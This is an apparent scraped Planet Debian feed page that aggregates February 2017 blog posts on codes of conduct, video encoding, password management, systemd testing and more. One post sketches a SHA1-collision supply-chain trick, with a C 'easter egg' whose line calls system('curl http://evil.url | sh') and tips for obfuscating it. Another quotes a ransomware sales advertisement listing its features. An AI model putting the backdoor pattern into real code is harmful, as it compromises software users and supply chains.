Planet Debian

Subscribe to Planet Debian feed
Planet Debian - http://planet.debian.org/
Updated: 2 hours 11 min ago

Matthew Garrett: The Fantasyland Code of Professionalism is an abuser's fantasy

27 February, 2017 - 08:40
The Fantasyland Institute of Learning is the organisation behind Lambdaconf, a functional programming conference perhaps best known for standing behind a racist they had invited as a speaker. The fallout of that has resulted in them trying to band together events in order to reduce disruption caused by sponsors or speakers declining to be associated with conferences that think inviting racists is more important than the comfort of non-racists, which is weird in all sorts of ways but not what I'm talking about here because they've also written a "Code of Professionalism" which is like a Code of Conduct except it protects abusers rather than minorities and no really it is genuinely as bad as it sounds.

The first thing you need to know is that the document uses its own jargon. Important here are the concepts of active and inactive participation - active participation is anything that you do within the community covered by a specific instance of the Code, inactive participation is anything that happens anywhere ever (ie, active participation is a subset of inactive participation). The restrictions based around active participation are broadly those that you'd expect in a very weak code of conduct - it's basically "Don't be mean", but with some quirks. The most significant is that there's a "Don't moralise" provision, which as written means saying "I think people who support slavery are bad" in a community setting is a violation of the code, but the description of discrimination means saying "I volunteer to mentor anybody from a minority background" could also result in any community member not from a minority background complaining that you've discriminated against them. It's just not very good.

Inactive participation is where things go badly wrong. If you engage in community or professional sabotage, or if you shame a member based on their behaviour inside the community, that's a violation. Community sabotage isn't defined and so basically allows a community to throw out whoever they want to. Professional sabotage means doing anything that can hurt a member's professional career. Shaming is saying anything negative about a member to a non-member if that information was obtained from within the community.

So, what does that mean? Here are some things that you are forbidden from doing:
  • If a member says something racist at a conference, you are not permitted to tell anyone who is not a community member that this happened (shaming)
  • If a member tries to assault you, you are not allowed to tell the police (shaming)
  • If a member gives a horribly racist speech at another conference, you are not allowed to suggest that they shouldn't be allowed to speak at your event (professional sabotage)
  • If a member of your community reports a violation and no action is taken, you are not allowed to warn other people outside the community that this is considered acceptable behaviour (community sabotage)

Now, clearly, some of these are unintentional - I don't think the authors of this policy would want to defend the idea that you can't report something to the police, and I'm sure they'd be willing to modify the document to permit this. But it's indicative of the mindset behind it. This policy has been written to protect people who are accused of doing something bad, not to protect people who have something bad done to them.

There are other examples of this. For instance, violations are not publicised unless the verdict is that they deserve banishment. If a member harasses another member but is merely given a warning, the victim is still not permitted to tell anyone else that this happened. The perpetrator is then free to repeat their behaviour in other communities, and the victim has to choose between either staying silent or warning them and risk being banished from the community for shaming.

If you're an abuser then this is perfect. You're in a position where your victims have to choose between their career (which will be harmed if they're unable to function in the community) and preventing the same thing from happening to others. Many will choose the former, which gives you far more freedom to continue abusing others. Which means that communities adopting the Fantasyland code will be more attractive to abusers, and become disproportionately populated by them.

I don't believe this is the intent, but it's an inevitable consequence of the priorities inherent in this code. No matter how many corner cases are cleaned up, if a code prevents you from saying bad things about people or communities it prevents people from being able to make informed choices about whether that community and its members are people they wish to associate with. When there are greater consequences to saying someone's racist than them being racist, you're fucking up badly.

comments

Steinar H. Gunderson: 10-bit H.264 tests

27 February, 2017 - 07:02

Following the post about 10-bit Y'CbCr earlier this week, I thought I'd make an actual test of 10-bit H.264 compression for live streaming. The basic question is; sure, it's better-per-bit, but it's also slower, so it is better-per-MHz? This is largely inspired by Ronald Bultje's post about streaming performance, where he largely showed that HEVC is currently useless for live streaming from software; unless you can encode at x264's “veryslow” preset (which, at 720p60, means basically rather simple content and 20 cores or so), the best x265 presets you can afford will give you worse quality than the best x264 presets you can afford. My results will maybe not be as scientific, but hopefully still enlightening.

I used the same test clip as Ronald, namely a two-minute clip of Tears of Steel. Note that this is an 8-bit input, so we're not testing the effects of 10-bit input; it's just testing the increased internal precision in the codec. Since my focus is practical streaming, I ran the last version of x264 at four threads (a typical desktop machine), using one-pass encoding at 4000 kbit/sec. Nageru's speed control has 26 presets to choose from, which gives pretty smooth steps between neighboring ones, but I've been sticking to the ten standard x264 presets (ultrafast, superfast, veryfast, faster, fast, medium, slow, slower, veryslow, placebo). Here's the graph:

The x-axis is seconds used for the encode (note the logarithmic scale; placebo takes 200–250 times as long as ultrafast). The y-axis is SSIM dB, so up and to the left is better. The blue line is 8-bit, and the red line is 10-bit. (I ran most encodes five times and averaged the results, but it doesn't really matter, due to the logarithmic scale.)

The results are actually much stronger than I assumed; if you run on (8-bit) ultrafast or superfast, you should stay with 8-bit, but from there on, 10-bit is on the Pareto frontier. Actually, 10-bit veryfast (18.187 dB) is better than 8-bit medium (18.111 dB), while being four times as fast!

But not all of us have a relation to dB quality, so I chose to also do a test that maybe is a bit more intuitive, centered around bitrate needed for constant quality. I locked quality to 18 dBm, ie., for each preset, I adjusted the bitrate until the SSIM showed 18.000 dB plus/minus 0.001 dB. (Note that this means faster presets get less of a speed advantage, because they need higher bitrate, which means more time spent entropy coding.) Then I measured the encoding time (again five times) and graphed the results:

x-axis is again seconds, and y-axis is bitrate needed in kbit/sec, so lower and to the left is better. Blue is again 8-bit and red is again 10-bit.

If the previous graph was enough to make me intrigued, this is enough to make me excited. In general, 10-bit gives 20-30% lower bitrate for the same quality and CPU usage! (Compare this with the supposed “up to 50%“ benefits of HEVC over H.264, given infinite CPU usage.) The most dramatic example is when comparing the “medium” presets directly, where 10-bit runs at 2648 kbit/sec versus 3715 kbit/sec (29% lower bitrate!) and is only 5% slower. As one progresses towards the slower presets, the gap is somewhat narrowed (placebo is 27% slower and “only” 24% lower bitrate), but in the realistic middle range, the difference is quite marked. If you run 3 Mbit/sec at 10-bit, you get the quality of 4 Mbit/sec at 8-bit.

So is 10-bit H.264 a no-brainer? Unfortunately, no; the client hardware support is nearly nil. Not even Skylake, which can do 10-bit HEVC encoding in hardware (and 10-bit VP9 decoding), can do 10-bit H.264 decoding in hardware. Worse still, mobile chipsets generally don't support it. There are rumors that iPhone 6s supports it, but these are unconfirmed; some Android chips support it, but most don't.

I guess this explains a lot of the limited uptake; since it's in some ways a new codec, implementers are more keen to get the full benefits of HEVC instead (even though the licensing situation is really icky). The only ones I know that have really picked it up as a distribution format is the anime scene, and they're feeling quite specific pains due to unique content (large gradients giving pronounced banding in undithered 8-bit).

So, 10-bit H.264: It's awesome, but you can't have it. Sorry :-)

Jonas Meurer: debian lts report 2017.02

26 February, 2017 - 00:22
Debian LTS report for February 2017

February 2017 was my sixth month as a Debian LTS team member. I was allocated 5 hours and had 9,75 hours left over from January 2017. This makes a total of 14,75 hours. I spent all of them doing the following:

  • DLA 831-1: Fix buffer overflows in gtk-vnc
  • Reviewed the apache2 2.2.22-13+deb7u8 upload, improved the patches
  • Reviewed CVE-2017-5666 (mp3splt)
  • DLA 836-1: Fix command injection vulnerability in munin cgi script
Links

Stefano Zacchiroli: Software Freedom Conservancy matching

25 February, 2017 - 22:15
become a Conservancy supporter by February 28th and have your donation matched

Non-profits that provide project support have proven themselves to be necessary for the success and advancement of individual projects and Free Software as a whole. The Free Software Foundation (founded in 1985) serves as a home to GNU projects and a canonical list of Free Software licenses. The Open Source Initiative came about in 1998, maintaining the Open Source Definition, based on the Debian Free Software Guidelines, with affiliate members including Debian, Mozilla, and the Wikimedia Foundation. Software in the Public Interest (SPI) was created in the late 90s largely to act as a fiscal sponsor for projects like Debian, enabling it to do things like accept donations and handle other financial transactions.

More recently (2006), the Software Freedom Conservancy was formed. Among other activities—like serving as a fiscal sponsor, infrastructure provider, and support organization for a number of free software projects including Git, Outreachy, and the Debian Copyright Aggregation Project—they protect user freedom via copyleft compliance and GPL enforcement work. Without a willingness to act when licenses are violated, copyleft has no power. Through communication, collaboration, and—only as last resort—litigation, the Conservancy helps everyone who uses a freedom respecting license.

The Conservancy has been aggressively fundraising in order to not just continue its current operations, but expand their work, staff, and efforts. They recently launched a donation matching campaign thanks to the generosity and dedication of an anonymous donor. Everyone who joins the Conservancy as a annual Supporter by February 28th will have their donation matched.

A number of us are already supporters, and hope you will join us in supporting the world of an organization that supports us.

Martin Pitt: systemd 233 about to be released, please help testing

25 February, 2017 - 19:41

systemd 233 is scheduled to be released next week, and there is only a handful of small issues left. As usual there are tons of improvements and fixes, but the most intrusive one probably is another attempt to move from legacy cgroup v1 to a “hybrid” setup where the new unified (cgroup v2) hierarchy is mounted at /sys/fs/cgroup/unified/ and the legacy one stays at /sys/fs/cgroup/ as usual. This should provide an easier path for software like Docker or LXC to migrate to the unified hiearchy, but even that hybrid mode broke some bits.

While systemd 233 will not make it into Debian stretch or Ubuntu zesty, as both are in feature freeze, it will soon be available in Debian experimental, and in the next Ubuntu release after 17.04 gets released. Thus now is another good time to give this some thorough testing!

To help with this, please give the PPA with builds from upstream master a spin. In addition to the usual packages for Ubuntu 16.10 I also uploaded a build for Ubuntu zesty, and a build for Debian stretch (aka testing) which also works on Debian sid. You can use that URL as an apt source:

deb [trusted=yes] https://people.debian.org/~mpitt/tmp/systemd-master-20170225/ /

These packages pass our autopkgtests and I tested them manually too. LXC and LXD work fine, docker.io/runc needs a fix which I uploaded to Ubuntu zesty. (It’s not yet available in Debian, sorry.)

Please file reports about regressions on GitHub, but please also le me know about successes on my Google+ page so that we can get some idea about how many people tested this.

Thank you, and happy booting!

Gunnar Wolf: Started getting ads for ransomware. Coincidence?

25 February, 2017 - 02:06

Very strange. Verrrry strange.

Yesterday I wrote a blog post on spam stuff that has been hitting my mailbox. Nothing too deep, just me scratching my head.

Coincidentally (I guess/hope), I have been getting messages via my Bitlbee to one of my Jabber accounts, offering me ransomware services. I am reproducing it here, omitting of course everything I can recognize as their brand names related URLs (as I'm not going to promote the 3vi1-doers). I'm reproducing this whole as I'm sure the information will be interesting for some.

*BRAND* Ransomware - The Most Advanced and Customisable you've Ever Seen
Conquer your Independence with *BRAND* Ransomware Full Lifetime License!
* UNIQUE FEATURES
* NO DEPENDENCIES (.net or whatever)!!!
* Edit file Icon and UAC - Works on All Windows Versions
* Set Folders and Extensions to Encrypt, Deadline and Russian Roulette
* Edit the Text, speak with voice (multilang) and Colors for Ransom Window
* Enable/disable USB infect, network spread & file melt
* Set Process Name, sleep time, update ransom amount, Give mercy button
* Full-featured headquarter (for Windows) with unlimited builds, PDF reports, charts and maps, totally autonomous operation
* PHP Bridges instead of expensive C&C servers!
* Automatic Bitcoin payment detection (impossible to bypass/crack - we challege who says the contrary to prove what they say!)
* Totally/Mathematically IMPOSSIBLE to DECRYPT! Period.
* Award-Winning Five-Stars support and constant updates!
* We Have lot vouchs in *BRAND* Market, can check!
Watch the promo video: *URL*
Screenshots: *URL*
Website: *URL*
Price: $389
Promo: just $309 - 20% OFF! until 25th Feb 2017
Jabber: *JID*

I think I can comment on this with my students. Hopefully, this is interesting to others.
Now... I had never received Jabber-spam before. This message has been sent to me 14 times in the last 24 hours (all from different JIDs, all unknown to me). I hope this does not last forever :-/ Otherwise, I will have to learn more on how to configure Bitlbee to ignore contacts not known to me. Grrr...

Jonathan Dowland: OpenShift Java S2I

24 February, 2017 - 22:21

One of the products I have done some work on at Red Hat has recently been released to customers and there have been a few things written about it:

Ritesh Raj Sarraf: Shivratri

24 February, 2017 - 21:43

जीवन का सत्य, शमशान।

शिव का है स्थान।

 

काली का तांडव नृत्य।

शिव का करे अभिनन्दन।

​​​​​

 

 

 

 

 

 

 

 

Categories: Keywords: Like: 

Sven Hoexter: Tcl and https - back to TclCurl

24 February, 2017 - 19:04

Must be the irony of life that I was about to give up the TclCurl Debian package some time ago, and now I'm using it again for some very old and horrible web scraping code.

The world moved on to https but the Tcl http package only supports unencrypted http. You can combine it with the tls package as explained in the Wiki, but that seems to be overly complicated compared to just loading the TclCurl binding and moving on with something like this:

package require TclCurl
# download to a variable
curl::transfer -url https://sven.stormbind.net -bodyvar page
# or store it in a file
curl::transfer -url https://sven.stormbind.net -file page.html

Now the remaining problem is that the code is unmaintained upstream and there is one codebase on bitbucket and one on github. While I fed patches to the bitbucket repo and thus based the Debian package on that repo, the github repo diverted in a different direction.

Joey Hess: SHA1 collision via ASCII art

24 February, 2017 - 08:06

Happy SHA1 collision day everybody!

If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.

The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)

Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks.

The "good" data chunk might then look like this:

7*yLN#!NOKj@{FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ

And the "bad" data chunk like this:

9xiV^Ksn=<A!<^}l4~`uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e}Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh

Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is.

Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */

/* Call this at the top of main() */
check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url | sh");
}

Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.)

After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.

Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them).

Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper.

You can pick either of these two lessons to take away:

  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo

  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

Steve Kemp: Rotating passwords

24 February, 2017 - 07:00

Like many people I use a password-manage to record logins to websites. I previously used a tool called pwsafe, but these days I switched to using pass.

Although I don't like the fact the meta-data is exposed the tool is very useful, and its integration with git is both simple and reliable.

Reading about the security issue that recently affected cloudflare made me consider rotating some passwords. Using git I figured I could look at the last update-time of my passwords. Indeed that was pretty simple:

git ls-tree -r --name-only HEAD | while read filename; do
  echo "$(git log -1 --format="%ad" -- $filename) $filename"
done

Of course that's not quite enough because we want it sorted, and to do that using the seconds-since-epoch is neater. All together I wrote this:

#!/bin/sh
#
# Show password age - should be useful for rotation - we first of all
# format the timestamp of every *.gpg file, as both unix+relative time,
# then we sort, and finally we output that sorted data - but we skip
# the first field which is the unix-epoch time.
#
( git ls-tree -r --name-only HEAD | grep '\.gpg$' | while read filename; do \
      echo "$(git log -1 --format="%at %ar" -- $filename) $filename" ; done ) \
        | sort | awk '{for (i=2; i<NF; i++) printf $i " "; print $NF}'

Not the cleanest script I've ever hacked together, but the output is nice:

 steve@ssh ~ $ cd ~/Repos/personal/pass/
 steve@ssh ~/Repos/personal/pass $ ./password-age | head -n 5
 1 year, 10 months ago GPG/root@localhost.gpg
 1 year, 10 months ago GPG/steve@steve.org.uk.OLD.gpg
 1 year, 10 months ago GPG/steve@steve.org.uk.NEW.gpg
 1 year, 10 months ago Git/git.steve.org.uk/root.gpg
 1 year, 10 months ago Git/git.steve.org.uk/skx.gpg

Now I need to pick the sites that are more than a year old and rotate credentials. Or delete accounts, as appropriate.

Stig Sandbeck Mathisen: Change all the passwords (again)

24 February, 2017 - 06:00

Looks like it is time to change all the passwords again. There’s a tiny little flaw in a CDN used … everywhere, it seems.

Here’s a quick hack for users of the “pass” password manager to qickly find the domains affected. It is not perfect, but it is fast. :)

#!/bin/bash

# Stig Sandbeck Mathisen <ssm@fnord.no>

# Checks the content of "pass" against the list of sites using cloudflare.
# Expect false positives, and possibly false negatives.

# TODO: remove the left part of each hostname from pass, to check domains.

set -euo pipefail

tempdir=$(mktemp -d)
trap 'echo >&2 "removing ${tempdir}" ; rm -rf "$tempdir"' EXIT

git clone https://github.com/pirate/sites-using-cloudflare.git "$tempdir"

grep -F -x -f \
  <(pass git ls-files  | sed -e s,/,\ ,g -e s/.gpg// | xargs -n 1 | sort -u) \
  "${tempdir}/sorted_unique_cf.txt" \
  | sort -u

Update: The previous example used parallel. Actually, I didn’t need that. Turns out, using grep correctly is much faster than using grep the wrong way. Lession: Read the manual. :)

Steinar H. Gunderson: Fyrrom recording released

24 February, 2017 - 05:28

The recording of yesterday's Fyrrom (Samfundet's unofficial take on Boiler Room) is now available on YouTube. Five video inputs, four hours, two DJs, no dropped frames. Good times.

Soundcloud coming soon!

Joerg Jaspert: Automated wifi login

24 February, 2017 - 03:32

If you have the fortune to need to follow some silly “Login” button for some wifi, regularly, the following little script may help you avoid this idiotic (and useless) task.

This example uses the WIFIonICE, the free wifi on german ICE trains, simply as I have it twice a day, and got annoyed by the pointless Login button. A friend pointed me at just wget-ting the login page, so I made Network-Manager do this for me. Should work for anything similar that doesn’t need some elaborate webform filled out.

#!/bin/bash

# (Some) docs at
# https://wiki.ubuntuusers.de/NetworkManager/Dispatcher/

IFACE=${1:-"none"}
ACTION=${2:-"up"}

case ${ACTION} in
    up)
        CONID=${CONNECTION_ID:-$(iwconfig $IFACE | grep ESSID | cut -d":" -f2 | sed 's/^[^"]*"\|"[^"]*$//g')}
        if [[ ${CONID} == WIFIonICE ]]; then
            /usr/bin/timeout -k 20 15 /usr/bin/wget -q -O - http://www.wifionice.de/?login > /dev/null
        fi
        ;;
    *)
        # We are not interested in this
        :
        ;;
esac

This script needs to be put into /etc/NetworkManager/dispatcher.d and made executable, owned by the root user. It will run on every connection change, thats why the ACTION is checked. The case may be a bit much here, but it could be easily extended to do a lot more.

Yay, no more silly “Open this webpage and press login” crap.

Lucas Nussbaum: Implementing “right to disconnect” by delaying outgoing email?

23 February, 2017 - 14:26

France passed a law about “right to disconnect” (more info here or here). The idea of not sending professional emails when people are not supposed to read them in order to protect their private lifes, is a pretty good one, especially when hierarchy is involved. However, I tend to do email at random times, and I would rather continue doing that, but just delay the actual sending of the email to the appropriate time (e.g., when I do email in the evening, it would actually be sent the following morning at 9am).

I wonder how I could make this fit into my email workflow. I write email using mutt on my laptop, then push it locally to nullmailer, that then relays it,  over an SSH tunnel, to a remote server (running Exim4).

Of course the fallback solution would be to use mutt’s postponing feature. Or to draft the email in a text editor. But that’s not really nice, because it requires going back to the email at the appropriate time. I would like a solution where I would write the email, add a header (or maybe manually add a Date: header — in all cases that header should reflect the time the mail was sent, not the time it was written), send the email, and have nullmailer or the remote server queue it until the appropriate time is reached (e.g., delaying while “current_time < Date header in email”). I don’t want to do that for all emails: e.g. personal emails can go out immediately.

Any ideas on how to implement that? I’m attached to mutt and relaying using SSH, but not attached to nullmailer or exim4. Ideally the delaying would happen on my remote server, so that my laptop doesn’t need to be online at the appropriate time.

Update: mutt does not allow to set the Date: field manually (if you enable the edit_headers option and edit it manually, its value gets overwritten). I did not find the relevant code yet, but that behaviour is mentioned in that bug.

Update 2: ah, it’s this code in sendlib.c (and there’s no way to configure that behaviour):

 /* mutt_write_rfc822_header() only writes out a Date: header with
 * mode == 0, i.e. _not_ postponment; so write out one ourself */
 if (post)
   fprintf (msg->fp, "%s", mutt_make_date (buf, sizeof (buf)));

Gunnar Wolf: Spam: Tactics, strategy, and angry bears

23 February, 2017 - 12:55

I know spam is spam is spam, and I know trying to figure out any logic underneath it is a lost cause. However... I am curious.

Many spam subjects are seemingly random, designed to convey whatever "information" they contain and fool spam filters. I understand that.

Many spam subjects are time-related. As an example, in the last months there has been a surge of spam mentioning Donald Trump. I am thankful: Very easy to filter out, even before it reaches spamassassin.

Of course, spam will find thousands of ways to talk about sex; cialis/viagra sellers, escort services, and a long list of WTF.

However... Tactical flashlights. Bright enough to blind a bear.

WTF‽‽‽

I mean... Truly. Really. WTF‽‽

What does that mean? Why is that even a topic? Who is interested in anything like that? How often does the average person go camping in the woods? Why do we need to worry about stupid bears attacking us? Why would a bear attack me?

The list of WTF questions could go on forever. What am I missing? What does "tactical flashlight" mean that I just fail to grasp? Has this appeared in your spam?

Antoine Beaupré: The case against password hashers

23 February, 2017 - 00:00

In previous articles, we have looked at how to generate passwords and did a review of various password managers. There is, however, a third way of managing passwords other than remembering them or encrypting them in a "vault", which is what I call "password hashing".

A password hasher generates site-specific passwords from a single master password using a cryptographic hash function. It thus allows a user to have a unique and secure password for every site they use while requiring no storage; they need only to remember a single password. You may know these as "deterministic or stateless password managers" but I find the "password manager" phrase to be confusing because a hasher doesn't actually store any passwords. I do not think password hashers represent a good security tradeoff so I generally do not recommend their use, unless you really do not have access to reliable storage that you can access readily.

In this article, I use the word "password" for a random string used to unlock things, but "token" to represent a generated random string that the user doesn't need to remember. The input to a password hasher is a password with some site-specific context and the output from a password hasher is a token.

What is a password hasher?

A password hasher uses the master password and a label (generally the host name) to generate the site-specific password. To change the generated password, the user can modify the label, for example by appending a number. Some password hashers also have different settings to generate tokens of different lengths or compositions (symbols or not, etc.) to accommodate different site-specific password policies.

The whole concept of password hashers relies on the concept of one-way cryptographic hash functions or key derivation functions that take an arbitrary input string (say a password) and generate a unique token, from which it is impossible to guess the original input string. Password hashers are generally written as JavaScript bookmarklets or browser plugins and have been around for over a decade.

The biggest advantage of password hashers is that you only need to remember a single password. You do not need to carry around a password manager vault: there's no "state" (other than site-specific settings, which can be easily guessed). A password hasher named Master Password makes a compelling case against traditional password managers in its documentation:

It's as though the implicit assumptions are that everybody backs all of their stuff up to at least two different devices and backups in the cloud in at least two separate countries. Well, people don't always have perfect backups. In fact, they usually don't have any.

It goes on to argue that, when you lose your password: "You lose everything. You lose your own identity."

The stateless nature of password hashers also means you do not need to use cloud services to synchronize your passwords, as there is (generally, more on that later) no state to carry around. This means, for example, that the list of accounts that you have access to is only stored in your head, and not in some online database that could be hacked without your knowledge. The downside of this is, of course, that attackers do not actually need to have access to your password hasher to start cracking it: they can try to guess your master key without ever stealing anything from you other than a single token you used to log into some random web site.

Password hashers also necessarily generate unique passwords for every site you use them on. While you can also do this with password managers, it is not an enforced decision. With hashers, you get distinct and strong passwords for every site with no effort.

The problem with password hashers

If hashers are so great, why would you use a password manager? Programs like LessPass and Master Password seem to have strong crypto that is well implemented, so why isn't everyone using those tools?

Password hashing, as a general concept, actually has serious problems: since the hashing outputs are constantly compromised (they are sent in password forms to various possibly hostile sites), it's theoretically possible to derive the master password and then break all the generated tokens in one shot. The use of stronger key derivation functions (like PBKDF2, scrypt, or HMAC) or seeds (like a profile-specific secret) makes those attacks much harder, especially if the seed is long enough to make brute-force attacks infeasible. (Unfortunately, in the case of Password Hasher Plus, the seed is derived from Math.random() calls, which are not considered cryptographically secure.)

Basically, as stated by Julian Morrison in this discussion:

A password is now ciphertext, not a block of line noise. Every time you transmit it, you are giving away potential clues of use to an attacker. [...] You only have one password for all the sites, really, underneath, and it's your secret key. If it's broken, it's now a skeleton-key [...]

Newer implementations like LessPass and Master Password fix this by using reasonable key derivation algorithms (PBKDF2 and scrypt, respectively) that are more resistant to offline cracking attacks, but who knows how long those will hold? To give a concrete example, if you would like to use the new winner of the password hashing competition (Argon2) in your password manager, you can patch the program (or wait for an update) and re-encrypt your database. With a password hasher, it's not so easy: changing the algorithm means logging in to every site you visited and changing the password. As someone who used a password hasher for a few years, I can tell you this is really impractical: you quickly end up with hundreds of passwords. The LessPass developers tried to facilitate this, but they ended up mostly giving up.

Which brings us to the question of state. A lot of those tools claim to work "without a server" or as being "stateless" and while those claims are partly true, hashers are way more usable (and more secure, with profile secrets) when they do keep some sort of state. For example, Password Hasher Plus records, in your browser profile, which site you visited and which settings were used on each site, which makes it easier to comply with weird password policies. But then that state needs to be backed up and synchronized across multiple devices, which led LessPass to offer a service (which you can also self-host) to keep those settings online. At this point, a key benefit of the password hasher approach (not keeping state) just disappears and you might as well use a password manager.

Another issue with password hashers is choosing the right one from the start, because changing software generally means changing the algorithm, and therefore changing passwords everywhere. If there was a well-established program that was be recognized as a solid cryptographic solution by the community, I would feel more confident. But what I have seen is that there are a lot of different implementations each with its own warts and flaws; because changing is so painful, I can't actually use any of those alternatives.

All of the password hashers I have reviewed have severe security versus usability tradeoffs. For example, LessPass has what seems to be a sound cryptographic implementation, but using it requires you to click on the icon, fill in the fields, click generate, and then copy the password into the field, which means at least four or five actions per password. The venerable Password Hasher is much easier to use, but it makes you type the master password directly in the site's password form, so hostile sites can simply use JavaScript to sniff the master password while it is typed. While there are workarounds implemented in Password Hasher Plus (the profile-specific secret), both tools are more or less abandoned now. The Password Hasher homepage, linked from the extension page, is now a 404. Password Hasher Plus hasn't seen a release in over a year and there is no space for collaborating on the software — the homepage is simply the author's Google+ page with no information on the project. I couldn't actually find the source online and had to download the Chrome extension by hand to review the source code. Software abandonment is a serious issue for every project out there, but I would argue that it is especially severe for password hashers.

Furthermore, I have had difficulty using password hashers in unified login environments like Wikipedia's or StackExchange's single-sign-on systems. Because they allow you to log in with the same password on multiple sites, you need to choose (and remember) what label you used when signing in. Did I sign in on stackoverflow.com? Or was it stackexchange.com?

Also, as mentioned in the previous article about password managers, web-based password managers have serious security flaws. Since more than a few password hashers are implemented using bookmarklets, they bring all of those serious vulnerabilities with them, which can range from account name to master password disclosures.

Finally, some of the password hashers use dubious crypto primitives that were valid and interesting a decade ago, but are really showing their age now. Stanford's pwdhash uses MD5, which is considered "cryptographically broken and unsuitable for further use". We have seen partial key recovery attacks against MD5 already and while those do not allow an attacker to recover the full master password yet (especially not with HMAC-MD5), I would not recommend anyone use MD5 in anything at this point, especially if changing that algorithm later is hard. Some hashers (like Password Hasher and Password Plus) use a a single round of SHA-1 to derive a token from a password; WPA2 (standardized in 2004) uses 4096 iterations of HMAC-SHA1. A recent US National Institute of Standards and Technology (NIST) report also recommends "at least 10,000 iterations of the hash function".

Conclusion

Forced to suggest a password hasher, I would probably point to LessPass or Master Password, depending on the platform of the person asking. But, for now, I have determined that the security drawbacks of password hashers are not acceptable and I do not recommend them. It makes my password management recommendation shorter anyway: "remember a few carefully generated passwords and shove everything else in a password manager".

[Many thanks to Daniel Kahn Gillmor for the thorough reviews provided for the password articles.]

Note: this article first appeared in the Linux Weekly News. Also, details of my research into password hashers are available in the password hashers history article.

Neil McGovern: A new journey – GNOME Foundation Executive Director

22 February, 2017 - 23:50

For those who haven’t heard, I’ve been appointed as the new Executive Director of the GNOME Foundation, and I started last week on the 15th February.

It’s been an interesting week so far, mainly meeting lots of people and trying to get up to speed with what looks like an enormous job! However, I’m thoroughly excited by the opportunity and am very grateful for everyone’s warm words of welcome so far.

One of the main things I’m here to do is to try and help. GNOME is strong because of its community. It’s because of all of you that GNOME can produce world leading technologies and a desktop that is intuitive, clean and functional. So, if you’re stuck with something, or if there’s a way that either myself or the Foundation can help, then please speak up!

Additionally, I intend on making this blog a much more frequently updated one – letting people know what I’m doing, and highlighting cool things that are happening around the project. In that vein, this week I’ve also started contacting all our fantastic Advisory Board members. I’m also looking at finding sponsors for GUADEC and GNOME.Asia, so if you know of anyone, let me know! I also booked my travel to the GTK+ hackfest and to LibrePlanet – if you’re going to either of those, make sure you come and introduce yourself :)

Finally, a small advertisement for Friends of GNOME. Your generosity really does help the Foundation support development of GNOME. Join up today!

Lisandro Damián Nicanor Pérez Meyer: Developing an nrf51822 based embedded device with Qt Creator and Debian

22 February, 2017 - 20:18
I'm currently developing an nRF51822-based embedded device. Being one the Qt/Qt Creator maintainers in Debian I would of course try to use it for the development. Turns out it works pretty good... with some caveats.

There are already two quite interesting blog posts about using Qt Creator on MAC and on Windows, so I will not repeat the basics, as they are there. Both use qbs, but I managed to use CMake.

Instead I'll add some tips on the stuff that I needed to solve in order to make this happen on current Debian Sid.


  • The required toolchain is already in Debian, just install binutils-arm-none-eabi, gcc-arm-none-eabi and gdb-arm-none-eabi.
  • You will not find arm-none-eabi-gdb-py on the gdb-arm-none-eabi package. Fear not, the provided gdb binary is compiled against python so it will work.
  • To enable proper debugging be sure to follow this flag setup. If you are using CMake like in this example be sure to modify CMake/toolchain_gcc.cmake as necessary.
  • In Qt Creator you might find that, while try to run or debug your app, you are greated with a message box that says "Cannot debug: Local executable is not set." Just go to Projects →Run and change "Run configuration" until you get a valid path (ie, a path to the .elf or .out file) in the "Executable" field.

Cheers!

Enrico Zini: staticsite news: github mode and post series

22 February, 2017 - 20:10
GitHub mode

Tobias Gruetzmacher implemented GitHub mode for staticsite.

